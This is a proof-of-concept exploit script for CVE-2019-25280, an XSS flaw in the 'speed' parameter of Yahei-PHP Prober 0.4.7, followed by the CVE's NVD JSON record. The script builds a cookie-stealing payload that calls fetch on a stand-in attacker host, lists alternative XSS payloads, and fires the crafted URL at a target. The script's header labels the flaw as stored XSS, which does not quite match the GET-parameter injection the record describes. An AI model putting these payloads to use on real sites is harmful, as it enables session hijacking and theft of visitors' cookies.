CVE-2019-25280

# CVE-2019-25280 PoC - Yahei-PHP Prober HTML Injection # Affected Version: Yahei-PHP Prober <= 0.4.7 # Attack Vector: GET parameter 'speed' # Impact: Stored XSS, Cookie Theft, Session Hijacking import requests from urllib.parse import quote target_url = "http://target.com/prober.php" # XSS payload to steal cookies xss_payload = '<script>fetch("https://attacker.com/log?c="+document.cookie)</script>' # Alternative payloads alt_payloads = [ '<img src=x onerror=alert(document.cookie)>', '<svg onload=alert(1)>', '<iframe src="javascript:alert(document.domain)">' ] # Construct malicious URL malicious_url = f"{target_url}?speed={quote(xss_payload)}" print(f"[*] Target: {target_url}") print(f"[*] Malicious URL: {malicious_url}") print(f"[*] Payload: {xss_payload}") # Verify vulnerability try: response = requests.get(malicious_url, timeout=10) if xss_payload in response.text: print("[+] VULNERABLE: Payload successfully injected") else: print("[-] Possibly patched or not vulnerable") except requests.RequestException as e: print(f"[-] Request failed: {e}")

{"cve": {"id": "CVE-2019-25280", "sourceIdentifier": "[email protected]", "published": "2026-01-08T00:15:58.280", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Yahei-PHP Prober 0.4.7 contains a remote HTML injection vulnerability that allows attackers to execute arbitrary HTML code through the 'speed' GET parameter. Attackers can inject malicious HTML code in the 'speed' parameter of prober.php to trigger cross-site scripting in user browser sessions."}, {"lang": "es", "value": "Yahei-PHP Prober 0.4.7 contiene una vulnerabilidad de inyección HTML remota que permite a los atacantes ejecutar código HTML arbitrario a través del parámetro GET 'speed'. Los atacantes pueden inyectar código HTML malicioso en el parámetro 'speed' de prober.php para desencadenar cross-site scripting en las sesiones del navegador del usuario."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:A/VC:N/VI:N/VA:N/SC:L/SI:L/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 5.1, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "NONE", "userInteraction": "ACTIVE", "vulnConfidentialityImpact": "NONE", "vulnIntegrityImpact": "NONE", "vulnAvailabilityImpact": "NONE", "subConfidentialityImpact": "LOW", "subIntegrityImpact": "LOW", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "baseScore": 6.1, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 2.7}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-79"}]}], "references": [{"url": "https://cxsecurity.com/issue/WLB-2019070132", "source": "[email protected]"}, {"url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/164412", "source": "[email protected]"}, {"url": "https://packetstormsecurity.com/files/153756", "source": "[email protected]"}, {"url": "https://web.archive.org/web/20190623143100/http://www.yahei.net/", "source": "[email protected]"}, {"url": "https://www.zeroscience.mk/en/vulnerabilities/ZSL-2019-5531.php", "source": "[email protected]"}, {"url": "https://cxsecurity.com/issue/WLB-2019070132", "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0"}, {"url": "https://www.zeroscience.mk/en/vulnerabilities/ZSL-2019-5531.php", "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0"}]}}